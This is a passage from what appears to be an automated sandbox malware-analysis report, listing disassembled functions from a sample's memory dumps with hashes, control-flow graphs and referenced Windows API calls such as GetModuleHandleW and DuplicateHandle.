                                                                                                                      • Instruction ID: 1067a92d76a290c1262e40b3e3ec3f7493bfd238e8e4472ec6f2dcd18fbe4b5a
                                                                                                                      • Opcode Fuzzy Hash: c3701fa31e223a4976b4bfb66b16e8a5d5695bbdb4bd497b2d332b5bd539c75a
                                                                                                                      • Instruction Fuzzy Hash: F421B7B1D05618CBEB18CF9BD9457DEFAF7AFC8300F14C16AD409A6294DB7509468FA0
                                                                                                                      Function 0870B990 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 426 870b990-870b9c3 427 870b9c5 426->427 428 870b9ca-870ba8a 426->428 427->428 462 870ba8d call 870bbc0 428->462 463 870ba8d call 870bbb1 428->463 434 870ba93-870bb29 444 870ba39-870ba3d 434->444 445 870ba45-870bb12 call 870b908 444->445 446 870ba3f-870bb9b 444->446 458 870ba07-870ba0c 445->458 459 870bb18-870bb1e 445->459 464 870bb9d call 870c820 446->464 465 870bb9d call 870c810 446->465 466 870bb9d call 870c931 446->466 467 870bb9d call 870cc9e 446->467 458->444 460 870ba0e-870ba0f 458->460 459->458 460->444 461 870bba3-870bbad 462->434 463->434 464->461 465->461 466->461 467->461
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Te^q$Te^q
                                                                                                                      • API String ID: 0-3743469327
                                                                                                                      • Opcode ID: 8dd8a13714b3622716c4ec328209cd4359b9d9e6a3f2baeafd4d48500b6c71b6
                                                                                                                      • Instruction ID: 736acd8ccf14fe5e94455abcaf46c63ca03c47056fc50d5c4acd857eae53fac1
                                                                                                                      • Opcode Fuzzy Hash: 8dd8a13714b3622716c4ec328209cd4359b9d9e6a3f2baeafd4d48500b6c71b6
                                                                                                                      • Instruction Fuzzy Hash: FD71E5B4E08219CFDB04CFA9C9846EDBBF6BF89311F10912AE415AB399DB345945CF60
                                                                                                                      Function 08706A90 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 603 8706a90-8706aa3 604 8706ac2-8706ac9 603->604 605 8706aa5-8706aa8 603->605 608 8706ad1-8706b15 604->608 606 8706ab1-8706ac0 605->606 607 8706aaa 605->607 606->605 607->604 607->606 609 8706b17-8706b1d 607->609 608->605 611 8706b21-8706b2d 609->611 612 8706b1f 609->612 614 8706b2f-8706b3e 611->614 612->614 618 8706b40-8706b46 614->618 619 8706b56-8706b69 614->619 620 8706b48 618->620 621 8706b4a-8706b4c 618->621 620->619 621->619
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8bq$8bq
                                                                                                                      • API String ID: 0-1276831224
                                                                                                                      • Opcode ID: 3902a0b4a695e77b24c8181acea7cfd3b62d90a523d6cef9b238021f48b1cd58
                                                                                                                      • Instruction ID: 26ac65a6a5a0df1b3d6d0ed6bb29aec96f07fc9cf7bba0cbd186b34e3d464b4d
                                                                                                                      • Opcode Fuzzy Hash: 3902a0b4a695e77b24c8181acea7cfd3b62d90a523d6cef9b238021f48b1cd58
                                                                                                                      • Instruction Fuzzy Hash: A821D8B1B44304DFEB04DA7C992466B77E6EBD8306B204479D106D73C8DE70DD114BA2
                                                                                                                      Function 0242ADA8 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 625 242ada8-242adb7 626 242ade3-242ade7 625->626 627 242adb9-242adc6 call 242a0cc 625->627 628 242adfb-242ae3c 626->628 629 242ade9-242adf3 626->629 634 242adc8 627->634 635 242addc 627->635 636 242ae49-242ae57 628->636 637 242ae3e-242ae46 628->637 629->628 682 242adce call 242b040 634->682 683 242adce call 242b031 634->683 635->626 639 242ae7b-242ae7d 636->639 640 242ae59-242ae5e 636->640 637->636 638 242add4-242add6 638->635 641 242af18-242afd8 638->641 642 242ae80-242ae87 639->642 643 242ae60-242ae67 call 242a0d8 640->643 644 242ae69 640->644 677 242afe0-242b00b GetModuleHandleW 641->677 678 242afda-242afdd 641->678 646 242ae94-242ae9b 642->646 647 242ae89-242ae91 642->647 645 242ae6b-242ae79 643->645 644->645 645->642 650 242aea8-242aeaa call 242a0e8 646->650 651 242ae9d-242aea5 646->651 647->646 654 242aeaf-242aeb1 650->654 651->650 656 242aeb3-242aebb 654->656 657 242aebe-242aec3 654->657 656->657 658 242aee1-242aeee 657->658 659 242aec5-242aecc 657->659 666 242aef0-242af0e 658->666 667 242af11-242af17 658->667 659->658 661 242aece-242aede call 242a0f8 call 242a108 659->661 661->658 666->667 679 242b014-242b028 677->679 680 242b00d-242b013 677->680 678->677 680->679 682->638 683->638
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0242AFFE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4139908857-0
                                                                                                                      • Opcode ID: b8f4c94c99e450365629fe361de771da4af8d313174fce9711f2e8f031702a83
                                                                                                                      • Instruction ID: 445437f87d92a18fdb939d09142bc641012008ad5dccb5d95678f8a9abc506b5
                                                                                                                      • Opcode Fuzzy Hash: b8f4c94c99e450365629fe361de771da4af8d313174fce9711f2e8f031702a83
                                                                                                                      • Instruction Fuzzy Hash: C2811370A00B258FD724DF2AD54479ABBF6FF48304F408A2ED88697B50D775E84ACB90
                                                                                                                      Function 02425914 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 684 2425914-24259e1 CreateActCtxA 686 24259e3-24259e9 684->686 687 24259ea-2425a44 684->687 686->687 694 2425a53-2425a57 687->694 695 2425a46-2425a49 687->695 696 2425a68 694->696 697 2425a59-2425a65 694->697 695->694 699 2425a69 696->699 697->696 699->699
                                                                                                                      APIs
                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 024259D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Create
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2289755597-0
                                                                                                                      • Opcode ID: b67f37ec9039ae60cc62f5b449218de569fa7ff6e1b887c72165f1246059843a
                                                                                                                      • Instruction ID: 04dc0a12e1bf5fb815738353d80f1d5fa235f799d2d8db2a86ddf1d097c174fb
                                                                                                                      • Opcode Fuzzy Hash: b67f37ec9039ae60cc62f5b449218de569fa7ff6e1b887c72165f1246059843a
                                                                                                                      • Instruction Fuzzy Hash: 2441F5B0C00619CFDB24DFAAC884BDEFBB5BF44304F6480AAD408AB255D775694ACF50
                                                                                                                      Function 024244B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 700 24244b4-24259e1 CreateActCtxA 703 24259e3-24259e9 700->703 704 24259ea-2425a44 700->704 703->704 711 2425a53-2425a57 704->711 712 2425a46-2425a49 704->712 713 2425a68 711->713 714 2425a59-2425a65 711->714 712->711 716 2425a69 713->716 714->713 716->716
                                                                                                                      APIs
                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 024259D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Create
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2289755597-0
                                                                                                                      • Opcode ID: 212b396ed1aeac1f34720515459379ec645160824978e4fa79c0f5bf0fd9dc9e
                                                                                                                      • Instruction ID: fd33779ce4bf65fa85584907b165b5498f8edba6944daf7f4db6d8a298349ef2
                                                                                                                      • Opcode Fuzzy Hash: 212b396ed1aeac1f34720515459379ec645160824978e4fa79c0f5bf0fd9dc9e
                                                                                                                      • Instruction Fuzzy Hash: 1841C4B0C00619CBDB24DFAAC844B9EBBB5BF45304F64809AD408AB255DB756949CF90
                                                                                                                      Function 04BD4040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 717 4bd4040-4bd407c 718 4bd412c-4bd414c 717->718 719 4bd4082-4bd4087 717->719 726 4bd414f-4bd415c 718->726 720 4bd4089-4bd40c0 719->720 721 4bd40da-4bd4112 CallWindowProcW 719->721 727 4bd40c9-4bd40d8 720->727 728 4bd40c2-4bd40c8 720->728 722 4bd411b-4bd412a 721->722 723 4bd4114-4bd411a 721->723 722->726 723->722 727->726 728->727
                                                                                                                      APIs
                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04BD4101
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1708223217.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CallProcWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714655100-0
                                                                                                                      • Opcode ID: c6ef624581faa4b0ff97f9baab55ef5a9200a596216d48a1b8164895a5f362e1
                                                                                                                      • Instruction ID: 5ab27660f38f45b961f5821777bbb92b52dd2c184c64542d827516dba3fee7af
                                                                                                                      • Opcode Fuzzy Hash: c6ef624581faa4b0ff97f9baab55ef5a9200a596216d48a1b8164895a5f362e1
                                                                                                                      • Instruction Fuzzy Hash: 864127B5A00309DFDB14CF99C848A9AFBF5FB88314F24C499D519AB321D374A841CFA0
                                                                                                                      Function 0242D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 731 242d27c-242d724 DuplicateHandle 733 242d726-242d72c 731->733 734 242d72d-242d74a 731->734 733->734
                                                                                                                      APIs
                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0242D656,?,?,?,?,?), ref: 0242D717
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DuplicateHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3793708945-0
                                                                                                                      • Opcode ID: 6a11ad1a413b24fda3f50f9b20433206829f00878a2c4d78139817d07f21abbf
                                                                                                                      • Instruction ID: 59cfa72019ab3ad01ebf3a0eb86f27f0e8d8cd9bad602b655a92d3df825c78cc
                                                                                                                      • Opcode Fuzzy Hash: 6a11ad1a413b24fda3f50f9b20433206829f00878a2c4d78139817d07f21abbf
                                                                                                                      • Instruction Fuzzy Hash: C421E3B5D00258DFDB10CF9AD984ADEFBF4EB48324F54805AE918A7310D378A954CFA5
                                                                                                                      Function 0242D688 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 737 242d688-242d68e 738 242d690-242d724 DuplicateHandle 737->738 739 242d726-242d72c 738->739 740 242d72d-242d74a 738->740 739->740
                                                                                                                      APIs
                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0242D656,?,?,?,?,?), ref: 0242D717
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DuplicateHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3793708945-0
                                                                                                                      • Opcode ID: 66c2c5140f83a434c34684e9673d9cf6b9e0f959f38f77cdc1311ff33f2f0cc1
                                                                                                                      • Instruction ID: 6e2fddda2310251691016518512999ea174250864de3ca2a750f9a7e6e681cc2
                                                                                                                      • Opcode Fuzzy Hash: 66c2c5140f83a434c34684e9673d9cf6b9e0f959f38f77cdc1311ff33f2f0cc1
                                                                                                                      • Instruction Fuzzy Hash: 202103B5900258DFDB10CF9AD984ADEBBF4EB48324F14802AE914A7311C378A944CFA5
                                                                                                                      Function 0242B031 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0242AFFE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4139908857-0
                                                                                                                      • Opcode ID: c77f355503ebf111ef2e61a147a5fd0cc5d49e933796481be0622b7d605471ef
                                                                                                                      • Instruction ID: 3fc6d940cfaee2964229c074259f3764018ad01f33332910a035a7b041b8c519
                                                                                                                      • Opcode Fuzzy Hash: c77f355503ebf111ef2e61a147a5fd0cc5d49e933796481be0622b7d605471ef
                                                                                                                      • Instruction Fuzzy Hash: B411BFB6A003248BD715DFABD8447ABBBB5EBC4318F04806BD559A7251CB74990ACFA0
                                                                                                                      Function 0242AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0242AFFE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1700118021.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2420000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4139908857-0
                                                                                                                      • Opcode ID: 989f5297d6b59145a5e2158a91e4a1d7ea8c9f2a6680b88269fe028b648623cd
                                                                                                                      • Instruction ID: 194d9650079964250b24c204196af2ed6b5f4884e0d7c580943e1516de77702e
                                                                                                                      • Opcode Fuzzy Hash: 989f5297d6b59145a5e2158a91e4a1d7ea8c9f2a6680b88269fe028b648623cd
                                                                                                                      • Instruction Fuzzy Hash: 171110B6C006598FCB10DF9AC444BDEFBF4EB88328F10842AD829A7310C379A545CFA1
                                                                                                                      Function 08706A80 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8bq
                                                                                                                      • API String ID: 0-187764589
                                                                                                                      • Opcode ID: c686557f9d121daa4c64c229f025e0fd2c7dda83ff34f1ceef40e62571bd6035
                                                                                                                      • Instruction ID: 92fd4b22992998e5a3dcdf61f0aeea725b44fc5bfdf3b340ff61f95281603bb2
                                                                                                                      • Opcode Fuzzy Hash: c686557f9d121daa4c64c229f025e0fd2c7dda83ff34f1ceef40e62571bd6035
                                                                                                                      • Instruction Fuzzy Hash: 0B11E7B1B04300DFEB449B6C992466A3BF6EBD8316B25417AD102D72D9DB70CD118BA2
                                                                                                                      Function 08706A43 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8bq
                                                                                                                      • API String ID: 0-187764589
                                                                                                                      • Opcode ID: 4c018b1342f5f955995d6fdbda24ded354167b0c992fb07171e95b8aaff96155
                                                                                                                      • Instruction ID: ae5c1a239744caac63549505b61a4fd56649e40aa934c6701a7bb636d17c215c
                                                                                                                      • Opcode Fuzzy Hash: 4c018b1342f5f955995d6fdbda24ded354167b0c992fb07171e95b8aaff96155
                                                                                                                      • Instruction Fuzzy Hash: B511C2B2B44300DFEB049B6C952467A77E6EBD8306B20846AD202D72D9DF70DD118FA6
                                                                                                                      Function 087016A0 Relevance: .5, Instructions: 523COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9c5178d39ee06f08b41fcdf847d7c2b78c54366759f93dad598f701c0992943c
                                                                                                                      • Instruction ID: 34a5331365bb86c289657935d8f53ea017852ed3065709fc1db6b7df4adae417
                                                                                                                      • Opcode Fuzzy Hash: 9c5178d39ee06f08b41fcdf847d7c2b78c54366759f93dad598f701c0992943c
                                                                                                                      • Instruction Fuzzy Hash: 0042F330D10619CFCF15EFA8C8446DCBBB1BF59301F518299D5497B268EB30AA99CFA1
                                                                                                                      Function 08701691 Relevance: .5, Instructions: 522COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 375c6facd203eeffe5f6ba1ecc59386f73f08ba94846e1c317487517de849101
                                                                                                                      • Instruction ID: 51547241d191c4415a9aefed3168cd55a5c8760418de9eaaa45e6bf7e77087af
                                                                                                                      • Opcode Fuzzy Hash: 375c6facd203eeffe5f6ba1ecc59386f73f08ba94846e1c317487517de849101
                                                                                                                      • Instruction Fuzzy Hash: 3A420230D10619CFCF15EFA8C8446DCBBB1BF49301F5182A9D5497B264EB30AA99CFA1
                                                                                                                      Function 08702808 Relevance: .5, Instructions: 475COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d4c4c0c8144ff14f16356375581960a4183a8d9eac0a8103586be65ff91578a8
                                                                                                                      • Instruction ID: 3585de7764ce04d7182e1afe6d9c0851a6756dc1e84c89ace941c0e3359bc6ff
                                                                                                                      • Opcode Fuzzy Hash: d4c4c0c8144ff14f16356375581960a4183a8d9eac0a8103586be65ff91578a8
                                                                                                                      • Instruction Fuzzy Hash: 3B226E31A10609CFCF15DF68C454A9DB7F2FF85300F1086AAE849AB255EB70EA85CF91
                                                                                                                      Function 0870BBC0 Relevance: .3, Instructions: 264COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 832dc7c90906086075d3b22ad456cf048ea1561ed80517ae3e3404d8f084cef9
                                                                                                                      • Instruction ID: 2812964ce3cfb5f5cc3934a0c0632927f957fb51171fbc999a268eb65fbf4940
                                                                                                                      • Opcode Fuzzy Hash: 832dc7c90906086075d3b22ad456cf048ea1561ed80517ae3e3404d8f084cef9
                                                                                                                      • Instruction Fuzzy Hash: C7B10670E15219CFCB40DFA8D540ADDBBB6FF89311F109625E509AB399DB30AA45CFA0
                                                                                                                      Function 0870BBB1 Relevance: .2, Instructions: 244COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dee54761b228093db0e1695210f675e0e2fe92159fd1bad9ed8d35f8dc8ce3ca
                                                                                                                      • Instruction ID: 1c3f0e2bd8b17ef58ef7ce42498a7c1f38c47b1525780cd6e1cb59fee23c1212
                                                                                                                      • Opcode Fuzzy Hash: dee54761b228093db0e1695210f675e0e2fe92159fd1bad9ed8d35f8dc8ce3ca
                                                                                                                      • Instruction Fuzzy Hash: 03A11970E15219CFCB44DFA8D540ADDBBB6FF89311F108625E509AB3A9DB30AA45CF60
                                                                                                                      Function 08700CF8 Relevance: .2, Instructions: 207COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ea090b6c2a224a26143b885ce803d4ddc25f71b20ccbac010398e785680a6d44
                                                                                                                      • Instruction ID: 8c4ecb5529fed5f4e31f82b669f3c66a49432a94cb664ef57cdff49f911dff8b
                                                                                                                      • Opcode Fuzzy Hash: ea090b6c2a224a26143b885ce803d4ddc25f71b20ccbac010398e785680a6d44
                                                                                                                      • Instruction Fuzzy Hash: 9F819030A00A19DFCB15EF68D4487ACBBF1FF44311F504469E445BB2A8EB709965CFA0
                                                                                                                      Function 08707EA8 Relevance: .2, Instructions: 175COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 259943b67cb77c86a974866d220cd2644233b810775f636ca1f02db00bf23c52
                                                                                                                      • Instruction ID: 513ffe1a2dbea03c5932d31c24458c5a579dfa52c59c64252e1066123abf485e
                                                                                                                      • Opcode Fuzzy Hash: 259943b67cb77c86a974866d220cd2644233b810775f636ca1f02db00bf23c52
                                                                                                                      • Instruction Fuzzy Hash: DC51B834E01119DBDB08DFADC8507AEBBF2FB84311F208526E555A73D8DB35AD428BA1
                                                                                                                      Function 08707E98 Relevance: .2, Instructions: 166COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1af022c9a38de1dd98ee94724074d31498702fb670834592c6b558713abd7363
                                                                                                                      • Instruction ID: cae990c2fd846da5225c422223ac502cbc8e5b5b9af7322e7d1065f4d8ec0fb5
                                                                                                                      • Opcode Fuzzy Hash: 1af022c9a38de1dd98ee94724074d31498702fb670834592c6b558713abd7363
                                                                                                                      • Instruction Fuzzy Hash: 7A51BA34E05105DBDB08DFADC9917AEBBF2FB84311F208526E555A73D8CB31AD428BA1
                                                                                                                      Function 087073E8 Relevance: .2, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8f5eb491355cd203b78d4e176466fbd679d802630e9d16f3213fad42bf2b8488
                                                                                                                      • Instruction ID: 2962698697fb7eb3cb59eed75d2cf65b4bf6af4dbf241c651faeb74a2fc06fcc
                                                                                                                      • Opcode Fuzzy Hash: 8f5eb491355cd203b78d4e176466fbd679d802630e9d16f3213fad42bf2b8488
                                                                                                                      • Instruction Fuzzy Hash: 5C51A431A04114DFDB09CFACC844ABEBFF2EB45342F148066F551AB2D9D776E8418BA1
                                                                                                                      Function 08705C71 Relevance: .2, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cfaedd5c9f1ea7460932041a7d61103c8f4c2438326f2f3415903e65d2b6a2cf
                                                                                                                      • Instruction ID: be2c801ae58cf52bc3f099b6a3507797e0866f74b16030ad913d07d4b40ac045
                                                                                                                      • Opcode Fuzzy Hash: cfaedd5c9f1ea7460932041a7d61103c8f4c2438326f2f3415903e65d2b6a2cf
                                                                                                                      • Instruction Fuzzy Hash: CB51AF31F042049FD704AB78D545AAEBBB2BF89300F14C4A9D8926F39ACF756D49CB91
                                                                                                                      Function 08705C80 Relevance: .2, Instructions: 152COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
